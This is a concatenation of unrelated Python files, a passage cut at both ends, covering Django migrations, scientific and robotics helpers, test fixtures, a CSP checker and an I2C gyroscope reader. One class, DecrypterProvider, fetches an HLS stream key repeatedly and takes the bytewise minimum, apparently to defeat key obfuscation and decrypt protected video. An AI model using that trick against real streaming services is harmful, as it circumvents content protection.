if t.ndim == 0:
y = np.zeros_like(self.y_old)
else:
x = x[:, None]
y = np.zeros((len(x), len(self.y_old)), dtype=self.y_old.dtype)
for i, f in enumerate(reversed(self.F)):
y += f
if i % 2 == 0:
y *= x
else:
y *= 1 - x
y += self.y_old
return y.T
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('extranet', '0001_initial'),
]
operations = [
migrations.RemoveField(
model_name='issue',
name='estimated_on',
),
migrations.AddField(
model_name='issue',
name='estimated_at',
field=models.DateTimeField(null=True, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='need',
name='description',
field=models.TextField(default=b''),
preserve_default=True,
),
]
|
# -*- coding: utf-8 -*-
#
# dbscan_cluster.py
#
# Copyright 2017 Sebastian Spreizer
# The MIT License
import numpy as np
from sklearn.cluster import DBSCAN
__all__ = [
'detect',
]
def detect(data, eps=1, min_samples=10, core_samples_mask=False):
X = np.vstack(data).T
db = DBSCAN(eps=eps, min_samples=min_samples).fit(X)
labels = db.labels_
# Number of clusters in labels, ignoring noise if present.
n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
if core_samples_mask:
core_samples_mask = np.zeros_like(db.labels_, dtype=bool)
core_samples_mask[db.core_sample_indices_] = True
return n_clusters_, labels, core_samples_mask
else:
return n_clusters_, labels
|
# Copyright (c) Lawrence Livermore National Security, LLC and other VisIt
# Project developers. See the top-level LICENSE file for dates and other
# details. No copyright assignment is required to contribute to VisIt.
"""
file: test_common.py
author: Cyrus Harrison (cyrush@llnl.gov)
created: 4/9/2010
description:
Unit tests for common helpers.
"""
import unittest
import os
import sys
from os.path import join as pjoin
from visit_utils import common
output_dir = pjoin(os.path.split(__file__)[0],"_output")
data_dir = pjoin(os.path.split(__file__)[0],"_data")
class TestCommon(unittest.TestCase):
def setUp(self):
if not os.path.exists(output_dir):
os.mkdir(output_dir)
def test_sexe(self):
ofile = pjoin(output_dir,"_sexe_test")
if os.path.exists(ofile):
os.remove(ofile)
common.sexe("touch %s" % ofile)
self.assertTrue(os.path.isfile(ofile))
def test_hostname(self):
res = common.hostname()
self.assertTrue(len(res) > 0)
def test_lsearch(self):
res = common.lsearch(dir(),"self")
self.assertTrue(len(res) > 0)
def test_define_module(self):
mymodule = common.define_module("mymodule","x=10.0")
self.assertEqual(mymodule.x,10.0)
def test_define_global_module(self):
common.define_module("mymodule","x=10.0",globals())
self.assertEqual(mymodule.x,10.0)
def test_load_params(self):
pfile = pjoin(data_dir,"params.test.in")
p = common.load_params(pfile)
self.assertEqual(p.tree.x,10.0)
def test_load_params_root(self):
pfile = pjoin(data_dir,"params.test.in")
p = common.load_params(pfile)
root = p.root
self.assertTrue(root.has_property("tree"))
self.assertEqual(root.tree.x,10.0)
if __name__ == '__main__':
unittest.main()
|
from Crypto.Cipher import AES
class DecrypterProvider(object):
def __init__(self, network, m3u8, get_by_comparison = False):
self.__network = network
self.m3u8 = m3u8
self.key = None
self.uri = self.m3u8.data["keys"][1]["uri"]
if get_by_comparison:
self.get_key_by_comparison()
else:
self.get_key()
def get_key_by_comparison(self) -> bytearray:
if self.key == None:
key1 = bytearray(self.__network.get(self.uri).content)
key2 = key1
tries = 1
while key1 == key2 and tries <=25:
key2 = bytearray(self.__network.get(self.uri).content)
tries += 1
final_key = []
for index in range(len(key1)):
smaller = min(key1[index], key2[index])
final_key.append(smaller)
self.key = bytearray(final_key)
return self.key
def get_key(self) -> bytearray:
if self.key == None:
self.key = bytearray(self.__network.get(self.uri).content)
return self.key
@staticmethod
def create_initialization_vector(chunk_number) -> bytearray:
iv = [0 for _ in range(0, 16)]
for i in range(12, 16):
iv[i] = chunk_number[0] >> 8 * (15 - i) & 255
return bytearray(iv)
def get_decrypter(self, chunk_number) -> AES:
iv = self.create_initialization_vector(chunk_number)
return AES.new(self.get_key(), AES.MODE_CBC, iv = iv) |
# -*- coding: utf-8 -*-
from __future__ import division, print_function
from libtbx.program_template import ProgramTemplate
from mmtbx.secondary_structure import ss_validation
# =============================================================================
class Program(ProgramTemplate):
description = '''
phenix.secondary_structure_validation: tool for validation of secondary
structure annotations.
Usage examples:
phenix.secondary_structure_validation model.pdb
phenix.secondary_structure_validation model.cif
phenix.secondary_structure_validation model.pdb nproc=7
'''
datatypes = ['model', 'phil']
master_phil_str = ss_validation.master_phil_str
# ---------------------------------------------------------------------------
def validate(self):
print('Validating inputs', file=self.logger)
self.data_manager.has_models(raise_sorry=True)
# ---------------------------------------------------------------------------
def run(self):
# I'm guessing self.data_manager, self.params and self.logger
# are already defined here...
print('Using model: %s' % self.data_manager.get_default_model_name(), file=self.logger)
# this must be mmtbx.model.manager?
model = self.data_manager.get_model()
self.val_obj = ss_validation.validate(
model=model,
params = self.params.ss_validation,
log = self.logger)
# ---------------------------------------------------------------------------
def get_results(self):
return self.val_obj.get_results()
# =============================================================================
# end
|
import requests
import os
import glob
from datetime import datetime, timedelta
def get_config(config_path):
"""
Funciton to get configuration file from online repository
"""
# Try to get config file or raise exception
try:
if config_path.startswith('http'):
r = requests.get(config_path)
config_var = r.text.split("\n")[:-1]
else:
with open(config_path) as f:
r = f.readlines()
config_var = [x.replace("\n", "") for x in r]
except requests.exceptions.RequestException as e:
raise SystemExit(e)
# Extract config variables to dictionary or raise Exception
try:
config = dict(x.split("=") for x in config_var)
except Exception:
raise Exception("Malformed .config file.")
# Return config variables as a dictionary
return(config)
def get_download_variables(dataset: str, country: str, end_date: str, config_path: str):
"""
Function to get downlaod variable for a particular dataset from config file
This could be simplified
"""
# Get config variables from repository
config = get_config(config_path)
# Extract dataset id or raise missing dataset error
try:
dataset_id = config["_".join([country, dataset, "ID"])]
except Exception:
raise KeyError(
"No config value for {}. To add a new dataset, see the Readme.".format(
"_".join([country, dataset, "ID"])
)
)
# Extract dataset origin or raise missing dataset error
try:
dataset_origin = config["_".join([country, dataset, "Origin"])]
except Exception:
raise KeyError(
"No config value for {}. To add a new dataset, see the Readme.".format(
"_".join([country, dataset, "Origin"])
)
)
# Convert datset origin string to datetime object
dataset_origin = date_str_to_datetime(dataset_origin)
# Return config variables as dict
return {
"dataset_id": dataset_id,
"start_date": dataset_origin,
"end_date": end_date,
}
def date_str_to_datetime(date: str):
"""
Function to parse origin date in the format '%Y_%m_%d_%H' or '%Y_%m_%d'
"""
# List of recognized date formats
formats = ["%Y_%m_%d_%H%M", "%Y_%m_%d_%H", "%Y_%m_%d"]
# Try to match formats until one succeeds
for format in formats:
try:
# Return datetime object
return datetime.strptime(date, format)
except ValueError:
pass
# Raise ValueError for unknown date format
raise ValueError("Unknown date format.")
def get_file_dates(start_date, end_date, frequency):
"""
Function to get date sequence between start_date and end_date with a
given frequency
This could be replaced by a datetime function
"""
# List to store dataset dates
data_dates = []
# Define start of date list
date = start_date
# Loop through date range, incrementing by `frequency` hours
while date < end_date:
data_dates.append(date)
date = date + timedelta(hours=frequency)
# Return list of dataset dates
return data_dates
def get_existing_dates(outdir: str, area: str):
"""
Function to get dates from files in the outdir
"""
# Extract file names from csv files in outdir (only for current area)
date_str = [os.path.basename(x) for x in glob.glob(outdir + "/" + area + "_" + "*.csv")]
# Remove area from file name
date_str = [x.replace(area + "_", "") for x in date_str]
# Remove extension from file name
date_str = [x.replace(".csv", "") for x in date_str]
# Convert date string to datetime object
date_str = [date_str_to_datetime(x) for x in date_str]
# If any existing files are found, notify user
if len(date_str) > 0:
message = "Found existing collection in output directory ({} files).\nOnly new files will be downloaded."
print(message.format(str(len(date_str))))
# Return a list of the dates of datasets that have already been downloaded
return date_str
|
from securityheaders.checkers import Finding, FindingType, FindingSeverity
from .cspcheck import CSPCheck
class CSPCheckDeprecated(CSPCheck):
def __init__(self, csp):
self.csp = csp
def check(self):
csp = self.csp
if not csp or not csp.parsedstring:
return []
findings = []
if csp.directive.REPORT_URI in csp.parsedstring:
findings.append(Finding(csp.headerkey,FindingType.DEPRECATED_DIRECTIVE,'report-uri is deprecated in CSP3. Please use the report-to directive instead.', FindingSeverity.INFO, csp.directive.REPORT_URI))
return findings
return []
|
from typing import Dict
import pytest
from django.apps import apps
from django.core import management
from django.test import RequestFactory
from radical_translations.agents.models import Organisation, Person
from radical_translations.agents.tests.factories import (
OrganisationFactory,
PersonFactory,
)
from radical_translations.cms.models import BiographyPage, BlogIndexPage, BlogPost
from radical_translations.cms.tests.factories import (
BiographyPageFactory,
BlogIndexPageFactory,
BlogPostFactory,
)
from radical_translations.core.models import Resource, Title
from radical_translations.core.tests.factories import ResourceFactory, TitleFactory
from radical_translations.users.models import User
from radical_translations.users.tests.factories import UserFactory
pytestmark = pytest.mark.django_db
@pytest.fixture(autouse=True)
def media_storage(settings, tmpdir):
settings.MEDIA_ROOT = tmpdir.strpath
@pytest.fixture
def user() -> User:
return UserFactory()
@pytest.fixture
def request_factory() -> RequestFactory:
return RequestFactory()
@pytest.fixture
@pytest.mark.django_db
def vocabulary():
management.call_command("vocab", "init")
app = apps.get_app_config("controlled_vocabulary")
app._load_vocabulary_managers() # type: ignore
@pytest.fixture
def organisation() -> Organisation:
return OrganisationFactory()
@pytest.fixture
def person() -> Person:
return PersonFactory()
@pytest.fixture
def resource() -> Resource:
return ResourceFactory()
@pytest.fixture
def title() -> Title:
return TitleFactory()
@pytest.fixture
def entry_original() -> Dict[str, Dict[str, str]]:
return {
"gsx$title": {"$t": "Les ruines ou Méditation sur les révolutions des Empires"},
"gsx$authors": {"$t": "Constantin-François Volney"},
"gsx$status": {"$t": "Source-text"},
"gsx$statussource": {"$t": ""},
"gsx$translationof": {"$t": ""},
"gsx$editionof": {"$t": ""},
"gsx$partof": {"$t": ""},
"gsx$journaltitle": {"$t": ""},
"gsx$editionnumber": {"$t": ""},
"gsx$year": {"$t": "1791"},
"gsx$location": {"$t": "0001: Paris [FR]"},
"gsx$organisation": {"$t": "Desenne"},
"gsx$language": {"$t": "French [fr]"},
"gsx$genre": {"$t": "essays"},
"gsx$url": {"$t": ""},
"gsx$libraries": {"$t": ""},
"gsx$notes": {"$t": ""},
"gsx$citation": {"$t": "some citation"},
"gsx$paratextnotes": {"$t": "note this"},
"gsx$paratextprefaceby": {"$t": ""},
}
@pytest.fixture
def entry_translation() -> Dict[str, Dict[str, str]]:
return {
"gsx$title": {"$t": "The Ruins: or a Survey of the Revolutions of Empires"},
"gsx$authors": {"$t": "James Marshall"},
"gsx$status": {"$t": "Translation: integral"},
"gsx$statussource": {"$t": ""},
"gsx$translationof": {
"$t": "Les ruines ou Méditation sur les révolutions des Empires"
},
"gsx$editionof": {"$t": ""},
"gsx$partof": {"$t": ""},
"gsx$journaltitle": {"$t": ""},
"gsx$editionnumber": {"$t": ""},
"gsx$year": {"$t": "1792"},
"gsx$isyearfictional": {"$t": "FALSE"},
"gsx$location": {"$t": "0002: London [UK]"},
"gsx$islocationfictional": {"$t": "FALSE"},
"gsx$organisation": {"$t": "J. Johnson"},
"gsx$language": {"$t": "English [en]"},
"gsx$genre": {"$t": "essay"},
"gsx$url": {"$t": ""},
"gsx$libraries": {"$t": ""},
"gsx$notes": {"$t": ""},
"gsx$citation": {"$t": "another citation"},
"gsx$paratextnotes": {"$t": "some more notes"},
"gsx$paratextprefaceby": {"$t": "author"},
}
@pytest.fixture
def entry_edition() -> Dict[str, Dict[str, str]]:
return {
"gsx$title": {"$t": "Discours sur le gouvernement"},
"gsx$authors": {"$t": "P.A. Samson; P.A. Dalila"},
"gsx$status": {"$t": "Translation: integral"},
"gsx$statussource": {"$t": ""},
"gsx$translationof": {"$t": "Discourses concerning government"},
"gsx$editionof": {"$t": "Discours sur le gouvernement"},
"gsx$partof": {"$t": ""},
"gsx$journaltitle": {"$t": ""},
"gsx$editionnumber": {"$t": ""},
"gsx$year": {"$t": "1794"},
"gsx$isyearfictional": {"$t": "FALSE"},
"gsx$location": {"$t": "0001: Paris [FR]"},
"gsx$islocationfictional": {"$t": "FALSE"},
"gsx$organisation": {"$t": "Josse"},
"gsx$language": {"$t": "French [fr]"},
"gsx$genre": {"$t": "essay"},
"gsx$theme": {"$t": ""},
"gsx$subject": {"$t": ""},
"gsx$url": {
"$t": "https://gallica.bnf.fr/ark:/12148/bpt6k2054034/f7.image.texteImage"
},
"gsx$libraries": {"$t": "BNF"},
"gsx$notes": {
"$t": (
"Extracts in La Décade philosophique vol 3, year III/1, no. 24, p. "
"537-544; vol 4, ear III/2, n. 26, p. 84-95."
)
},
"gsx$citation": {"$t": ""},
"gsx$paratextnotes": {"$t": ""},
"gsx$paratextprefaceby": {"$t": ""},
}
@pytest.fixture
def entry_search() -> Dict[str, Dict[str, str]]:
return {
"gsx$title": {"$t": "Les ruines de la search :)"},
"gsx$authors": {"$t": "search test"},
"gsx$status": {"$t": "Source-text"},
"gsx$statussource": {"$t": ""},
"gsx$translationof": {"$t": ""},
"gsx$editionof": {"$t": ""},
"gsx$partof": {"$t": ""},
"gsx$journaltitle": {"$t": ""},
"gsx$editionnumber": {"$t": ""},
"gsx$year": {"$t": "1791"},
"gsx$location": {"$t": "0001: Paris [FR]"},
"gsx$organisation": {"$t": "publisher name"},
"gsx$language": {"$t": "French [fr]"},
"gsx$genre": {"$t": "essay"},
"gsx$url": {"$t": ""},
"gsx$libraries": {"$t": ""},
"gsx$notes": {"$t": ""},
"gsx$citation": {"$t": ""},
"gsx$paratextnotes": {"$t": ""},
"gsx$paratextprefaceby": {"$t": ""},
}
@pytest.fixture
def blog_index_page() -> BlogIndexPage:
return BlogIndexPageFactory()
@pytest.fixture
def blog_post_1() -> BlogPost:
return BlogPostFactory()
@pytest.fixture
def blog_post_2() -> BlogPost:
return BlogPostFactory()
@pytest.fixture
def biography_page() -> BiographyPage:
return BiographyPageFactory()
|
# http://github.com/timestocome
# source code from
# https://github.com/bashardawood/L3G4200D-Python/blob/master/gyro.py
# data sheet
# https://www.parallax.com/sites/default/files/downloads/27911-Gyroscope-3-Axis-L3G4200D-Guide-v1.1.pdf
# i2c must be set up on Raspberry Pi first
# https://learn.adafruit.com/adafruits-raspberry-pi-lesson-4-gpio-setup/configuring-i2c
# wiring
# ground to ground (pin 6)
# vcc to 5V (pin 4)
# SDA to SDA (pin 3)
# SCL to SCL (pin 5)
#!/usr/bin/python
from time import sleep
import smbus
import string
#converts 16 bit two's compliment reading to signed int
def getSignedNumber(number):
if number & (1 << 15):
return number | ~65535
else:
return number & 65535
#open /dev/i2c-1
i2c_bus = smbus.SMBus(1)
#i2c slave address of the L3G4200D
# type sudo i2cdetect -y 1 to see which memory location has signal
i2c_address = 0x69
#initialise the L3G4200D
#normal mode and all axes on to control reg1
# hz = 250
#i2c_bus.write_byte_data(i2c_address,0x20,0x0F)
#full 2000dps to control reg4
hz = 2000
i2c_bus.write_byte_data(i2c_address,0x23,0x20)
# give the chip time to wake up
sleep(0.5)
px = py = pz = 0
#read data, combine and display
while True:
# read low and high bytes for x
i2c_bus.write_byte(i2c_address,0x28)
X_L = i2c_bus.read_byte(i2c_address)
i2c_bus.write_byte(i2c_address,0x29)
X_H = i2c_bus.read_byte(i2c_address)
# combine h and low bits ( shift H 8 bytes and or with L )
X = X_H << 8 | X_L
# y
i2c_bus.write_byte(i2c_address,0x2A)
Y_L = i2c_bus.read_byte(i2c_address)
i2c_bus.write_byte(i2c_address,0x2B)
Y_H = i2c_bus.read_byte(i2c_address)
Y = Y_H << 8 | Y_L
# z
i2c_bus.write_byte(i2c_address,0x2C)
Z_L = i2c_bus.read_byte(i2c_address)
i2c_bus.write_byte(i2c_address,0x2D)
Z_H = i2c_bus.read_byte(i2c_address)
Z = Z_H << 8 | Z_L
X = getSignedNumber(X)
Y = getSignedNumber(Y)
Z = getSignedNumber(Z)
# http://forum.arduino.cc/index.php?topic=183417.0
# 0.00875 degrees-per-second-per-LSB is 114.285714285714 LSB's-per-degree-per-second. :(
# To get DPS from the raw number you subtract the Zero Rate Offset
# (the value you get when not rotating),
# multiply the answer by 8.75 to get milli-DPS
# and divide by 1000 to get DPS (or multiply by 8750
# to get micro-DPS and divide by 1,000,000 to get DPS).
print('x %.1f y %.1f z %.1f location' %(X, Y, Z))
# see documentation and sample code
# https://www.parallax.com/product/27911
dx = (px - X) / 114
dy = (py - Y) / 114
dz = (pz - Z) / 114
print(dx, dy, dz)
px = X
py = Y
pz = Z
sleep(1.0)
|
# coding: utf-8
from __future__ import unicode_literals
import pandas as pd
from dframcy import utils
class DframCy(object):
"""
Dataframe integration with spaCy's linguistic annotations.
"""
def __init__(self, nlp_pipeline):
"""
:param nlp_pipeline: nlp pipeline to be used (i.e. language model).
"""
self._nlp = nlp_pipeline
@property
def nlp(self):
"""
To get texted nlped
:return: Spacy's Doc object
"""
return self._nlp
@staticmethod
def get_token_attribute_value(token, attribute_name, _type):
"""
To get value of specific attribute of spacy's Token class
:param token: token object of class Token
:param attribute_name: name attribute for which value is required
:param _type: type of class attribute (property, attribute)
:retrun: attribute value
"""
if _type == "attribute" or _type == "int_format_attribute":
value = getattr(token, attribute_name)
if attribute_name in ["head", "left_edge", "right_edge"]:
return value.text
else:
return value
elif _type == "property":
value = getattr(token, attribute_name)
if attribute_name in ["n_lefts", "n_rights", "has_vector", "is_sent_start"]:
return value
else:
return ", ".join([v.text for v in value])
elif _type == "additional_attribute":
if attribute_name == "id":
return getattr(token, "i")
elif attribute_name == "start":
return getattr(token, "idx")
elif attribute_name == "end":
return getattr(token, "idx") + len(token)
elif _type == "custom_attributes":
return getattr(getattr(token, "_"), attribute_name)
def get_token_attribute_dict(self, doc, consistent_columns):
"""
To get attribute dictionary for sequence of Token object in Doc
:param doc: Doc object
:param consistent_columns: name attributes required with its type
:return: python dictionary containing attributes names as keys
and list of all token values as value.
"""
token_attribute_dictionary = {}
for token in doc:
for column_name in consistent_columns:
if column_name[0] in token_attribute_dictionary:
token_attribute_dictionary[column_name[0]].append(
self.get_token_attribute_value(
token, column_name[0], column_name[1]
)
)
else:
token_attribute_dictionary[column_name[0]] = []
token_attribute_dictionary[column_name[0]].append(
self.get_token_attribute_value(
token, column_name[0], column_name[1]
)
)
return token_attribute_dictionary
@staticmethod
def get_named_entity_dict(doc):
"""
To get named entities from NLP processed text
:param doc: spacy container for linguistic annotations.
:return: dictionary containing entity_text and entity_label
"""
entity_details_dict = {"ent_text": [], "ent_label": []}
for ent in doc.ents:
entity_details_dict["ent_text"].append(ent.text)
entity_details_dict["ent_label"].append(ent.label_)
return entity_details_dict
def to_dataframe(
self, doc, columns=None, separate_entity_dframe=False, custom_attributes=None
):
"""
Convert Linguistic annotations for text into pandas dataframe
:param doc: spacy container for linguistic annotations.
:param columns: list of str, name of columns to be included in dataframe (default:
["id", "text", "start", "end", "pos_", "tag_", "dep_", "head", "ent_type_"])
:param separate_entity_dframe: bool, for separate entity dataframe (default: False)
:param custom_attributes: list, for custom attribute
:return: dataframe, dataframe containing linguistic annotations
"""
if columns is None:
columns = utils.get_default_columns()
if "id" not in columns:
columns = ["id"] + columns
consistent_columns = utils.check_columns_consistency(columns)
if custom_attributes:
consistent_columns += [
(attr, "custom_attributes") for attr in custom_attributes
]
token_attribute_dictionary = self.get_token_attribute_dict(
doc, consistent_columns
)
tokens_dataframe = pd.DataFrame.from_dict(token_attribute_dictionary)
new_column_names_map = {i: "token_" + i for i in tokens_dataframe.columns}
tokens_dataframe.rename(columns=new_column_names_map, inplace=True)
tokens_dataframe.reindex(tokens_dataframe["token_id"])
tokens_dataframe.drop(columns=["token_id"], inplace=True)
if not doc.ents and "token_ent_type_" in tokens_dataframe.columns:
tokens_dataframe.drop(columns=["token_ent_type_"], inplace=True)
if separate_entity_dframe:
entity_dict = self.get_named_entity_dict(doc)
entity_dataframe = pd.DataFrame.from_dict(entity_dict)
return (
tokens_dataframe
if not separate_entity_dframe
else (tokens_dataframe, entity_dataframe)
)
def add_entity_ruler(self, patterns):
"""
To add entity ruler in nlp pipeline
official doc: https://spacy.io/api/entityruler
:param patterns: list or list of lists of token/phrase based patterns
"""
ruler = self._nlp.add_pipe("entity_ruler")
ruler.add_patterns(patterns)
|
from collections import namedtuple
from typing import List, Tuple, Optional
import numpy as np
from dijkstar import Graph
from src.kinematics.forward_kinematics import geometric_jacobian
from src.kinematics.joints import BaseJoint
from src.prechecks.trajectory_segment import JointTrajSegment
START_NODE = -1
STOP_NODE = -2
NodeInfo = namedtuple('NodeInfo', 'conf joints seg_idx t')
def joint_limit_cost(joints: List[float], qlim: List[float], w: Optional[List[float]] = None) -> float:
"""
Measure to drive joints away from their limits.
:param joints: Joint coordinates to be evaluated
:param qlim: Joint limits in order [J1 min, J1 max, J2 min, J2 max, Jn min, Jn max]
:param w: Weights for the individual joints.
:return: Non-negative cost value for the given joint coordinates. Best is zero.
[1] B. Siciliano, L. Sciavicco, L. Villani und G. Oriolo, Robotics : Modelling, Planning and Control, London:
Springer, 2009.
"""
val = 0
if w is None:
for jmin, jmax, j in zip(qlim[::2], qlim[1::2], joints):
# Use distance from mid-point relative to total range
val += ((j - 0.5 * (jmin + jmax)) / (jmax - jmin)) ** 2
else:
if len(w) != len(joints):
raise ValueError('Need to supply as many weight factors as joint coordinates.')
for jmin, jmax, j, jw in zip(qlim[::2], qlim[1::2], joints, w):
val += jw * ((j - 0.5 * (jmin + jmax)) / (jmax - jmin)) ** 2
# Normalize with regard to number of joints
return val / (2 * len(joints))
def joint_velocity_cost(prev_j: List[float], curr_j: List[float], qdlim: List[float], dt: float,
w: Optional[List[float]] = None) -> float:
"""
Measure to penalize large joint velocities.
:param prev_j: Joint coordinates of the previous node
:param curr_j: Joint coordinate of the current node
:param qdlim: Maximum joint velocities in order
:param dt: Time Delta between the points in seconds
:param w: Weights for the individual joints.
:return: Non-negative cost value for the given joint coordinates. Best is zero.
"""
if w is not None:
if len(w) != len(curr_j):
raise ValueError('Need to supply as many weight factors as joint coordinates.')
else:
w = [1] * len(curr_j)
val = 0
for jprev, jcurr, j_vel_max, jw in zip(prev_j, curr_j, qdlim, w):
velocity_ratio = (jcurr - jprev) / (dt * j_vel_max)
val += jw * velocity_ratio ** 2
# Normalize with regard to number of joints
return val / (2 * len(curr_j))
def singularity_proximity_cost(config: List[BaseJoint], curr_j: List[float]) -> float:
"""
Measure to penalize singularity proximity.
:param config: List of joints containing coordinate transformations.
:param curr_j: Joint coordinate of the current node
:return: Non-negative cost value for the given joint coordinates. Best is zero.
"""
# Apply additional cost depending on proximity to singularitites
jac = geometric_jacobian(config, curr_j)
try:
# Since J is square: det(J*JT) = det(J) * det(JT) = (det(J))^2 >= 0
# sqrt((det(J))^2) = |(det(J))^2|
return 1 / abs(np.linalg.det(jac))
except ZeroDivisionError:
# Singularity
return float('Inf')
def calc_cost(curr: NodeInfo, prev: NodeInfo, qlim: List[float], qdlim: List[float], config: List[BaseJoint]) -> float:
"""
Calculate the edge cost between two nodes.
:param curr: Info about the current node
:param prev: Info about the previous node
:param qlim: Joint limits in order [J1 min, J1 max, J2 min, J2 max, Jn min, Jn max]
:param qdlim: Maximum joint velocities in order
:param config: List of joints containing coordinate transformations.
:return: Non-negative cost value for the given joint coordinates. Best is zero.
"""
if curr.seg_idx == prev.seg_idx:
if curr.conf != prev.conf:
# Currently, configuration changes within a segment are not allowed.
return float('Inf')
# Common configurations are fine
cost = joint_limit_cost(curr.joints, qlim)
# Proportional to joint delta
cost += joint_velocity_cost(prev.joints, curr.joints, qdlim, dt=curr.t - prev.t)
# Cost with regard to singularity proximity
cost += singularity_proximity_cost(config, curr.joints)
return cost
# Else
if curr.conf != prev.conf:
# Currently, configuration changes between segments are not allowed either (not worth it).
return float('Inf')
# return joint_limit_cost(curr.joints, qlim) + singularity_proximity_cost(config, curr.joints)
# Otherwise you can go as you like
return 0
def calc_node_idx(point_idx: int, configuration: int) -> int:
"""
Calculates a unique node index.
:param point_idx: Index of the point that the node belongs to within the trajectory.
:param configuration: Robot configuration for the node
:return: Integer value for the node index
"""
if 0 <= configuration <= 7:
if point_idx >= 0:
return 8 * point_idx + configuration
raise ValueError('Point index must be positive.')
raise ValueError('Only configurations from 0-7 are allowed.')
def calc_conf_from_node(node_idx, point_idx) -> int:
"""
Calculates the configuration from a node index
:param node_idx: Integer value for the node index
:param point_idx: Index of the point that the node belongs to within the trajectory.
:return: Integer value for the robot configuration of the node
"""
if point_idx >= 0:
return node_idx - 8 * point_idx
raise ValueError('Point index must be positive.')
def create_graph(joint_traj: List[JointTrajSegment], qlim: List[float], qdlim: List[float], config: List[BaseJoint]) \
-> Tuple[Graph, int, int]:
"""
Constructs a graph for a given joint trajectory.
The graph is unidirectional and has one common start and one common end node.
The graph consists of n layers with n being the total count of points in the joint trajectory.
The nodes within a layer are not connected but the nodes of adjacent layers are all connected initially.
For each point a node is created for each viable robot configuration/joint solution.
:param joint_traj: List of JointTrajectorySegments
:param qlim: Joint limits in order [J1 min, J1 max, J2 min, J2 max, Jn min, Jn max]
:param qdlim: Maximum joint velocities in order
:param config: List of joints containing coordinate transformations.
:return: Graph that can be used to determine shortest paths, start node, stop node.
"""
joint_network = Graph()
current_parents = {}
prev_seg_idx = 0
total_point_count = sum((len(segment.solutions) for segment in joint_traj))
point_idx = 0
# Iterate over all segments
for seg_idx, joint_segment in enumerate(joint_traj):
# Reset the time
t_prev_point = 0
# Iterate over points in task space and corresponding points in time per segment
for ik_solutions_point, t_curr_point in zip(joint_segment.solutions, joint_segment.time_points):
# Iterate over all nodes of the current point
for curr_conf, curr_j in ik_solutions_point.items():
node_idx = calc_node_idx(point_idx, curr_conf)
if point_idx == 0:
# First point nodes are all connected to start node (zero cost) and do not have distinct parent
# nodes.
joint_network.add_edge(START_NODE, node_idx, edge=0)
else:
# Following point nodes are connected to all nodes of the previous point
for prev_conf, prev_j in current_parents.items():
# Calculate the index of the previous node
previous_node_idx = calc_node_idx(point_idx - 1, prev_conf)
# Call a cost function to determine the transition cost between the nodes based on the robot
# configurations and the joint values.
curr_node_info = NodeInfo(conf=curr_conf, joints=curr_j, seg_idx=seg_idx, t=t_curr_point)
prev_node_info = NodeInfo(conf=prev_conf, joints=prev_j, seg_idx=prev_seg_idx, t=t_prev_point)
cost = calc_cost(curr_node_info, prev_node_info, qlim, qdlim, config)
# Add the edge to the graph
joint_network.add_edge(previous_node_idx, node_idx, edge=cost)
# Connect all last point nodes to a common last point (zero cost). This is useful to find the shortest path
# simply as path from START_NODE to STOP_NODE. The nodes are connected with zero cost.
if point_idx >= total_point_count - 1:
for curr_conf in ik_solutions_point.keys():
node_idx = calc_node_idx(point_idx, curr_conf)
joint_network.add_edge(node_idx, STOP_NODE, edge=0)
# Move forward to the next point and save the nodes of the current point as parents for the next point
current_parents = ik_solutions_point
t_prev_point = t_curr_point
point_idx += 1
# Move forward to the next segment
prev_seg_idx = seg_idx
return joint_network, START_NODE, STOP_NODE,
|
#!/usr/bin/env python3
# --------------------( LICENSE )--------------------
# Copyright (c) 2014-2022 Beartype authors.
# See "LICENSE" for further details.
'''
**Beartype decorator code generator magic** (i.e., global constants simplifying
code generation but *not* themselves code).
This private submodule is *not* intended for importation by downstream callers.
'''
# ....................{ IMPORTS }....................
from beartype._util.error.utilerror import EXCEPTION_PLACEHOLDER
# See the "beartype.cave" submodule for further commentary.
__all__ = ['STAR_IMPORTS_CONSIDERED_HARMFUL']
# ....................{ EXCEPTIONS }....................
EXCEPTION_PREFIX = EXCEPTION_PLACEHOLDER
'''
Human-readable substring unconditionally prefixing *all* exception messages
transitively across this subpackage, which the
:func:`beartype._util.error.utilerror.reraise_exception_placeholder` function
dynamically replaces with the name of both the currently decorated callable
*and* the currently iterated parameter or return of that callable.
Note that the :mod:`beartype._decor._code.codemain` submodule guarantees the
substring replacing this placeholder to be suffixed by a single space. Ergo, we
intentionally avoid doing so here.
'''
EXCEPTION_PREFIX_FUNC_WRAPPER_LOCAL = f'{EXCEPTION_PREFIX}wrapper parameter '
'''
Human-readable substring describing a new wrapper parameter required by the
current root type hint in exception messages.
'''
EXCEPTION_PREFIX_HINT = f'{EXCEPTION_PREFIX}type hint '
'''
Human-readable substring describing the current root type hint generically
(i.e., *without* respect to the specific PEP to which this hint conforms) in
exception messages.
'''
# ....................{ NAMES ~ parameter }....................
# To avoid colliding with the names of arbitrary caller-defined parameters, the
# beartype-specific parameter names *MUST* be prefixed by "__beartype_".
ARG_NAME_FUNC = '__beartype_func'
'''
Name of the **private decorated callable parameter** (i.e.,
:mod:`beartype`-specific parameter whose default value is the decorated
callable passed to all wrapper functions generated by the
:func:`beartype.beartype` decorator).
'''
ARG_NAME_GETRANDBITS = '__beartype_getrandbits'
'''
Name of the **private getrandbits parameter** (i.e., :mod:`beartype`-specific
parameter whose default value is the highly performant C-based
:func:`random.getrandbits` function conditionally passed to every wrapper
functions generated by the :func:`beartype.beartype` decorator internally
requiring one or more random integers).
'''
ARG_NAME_RAISE_EXCEPTION = '__beartype_raise_exception'
'''
Name of the **private exception raising parameter** (i.e.,
:mod:`beartype`-specific parameter whose default value is the
:func:`beartype._decor._error.errormain.raise_pep_call_exception`
function raising human-readable exceptions on call-time type-checking failures
passed to all wrapper functions generated by the :func:`beartype.beartype`
decorator).
'''
ARG_NAME_TYPISTRY = '__beartypistry'
'''
Name of the **private beartypistry parameter** (i.e., :mod:`beartype`-specific
parameter whose default value is the beartypistry singleton conditionally
passed to every wrapper function generated by the :func:`beartype.beartype`
decorator requiring one or more types or tuples of types cached by this
singleton).
'''
# ....................{ NAMES ~ locals }....................
VAR_NAME_PREFIX_PITH = '__beartype_pith_'
'''
Substring prefixing all local variables providing a **pith** (i.e., either the
current parameter or return value *or* item contained in the current parameter
or return value being type-checked by the current call).
'''
VAR_NAME_PITH_ROOT = f'{VAR_NAME_PREFIX_PITH}0'
'''
Name of the local variable providing the **root pith** (i.e., value of the
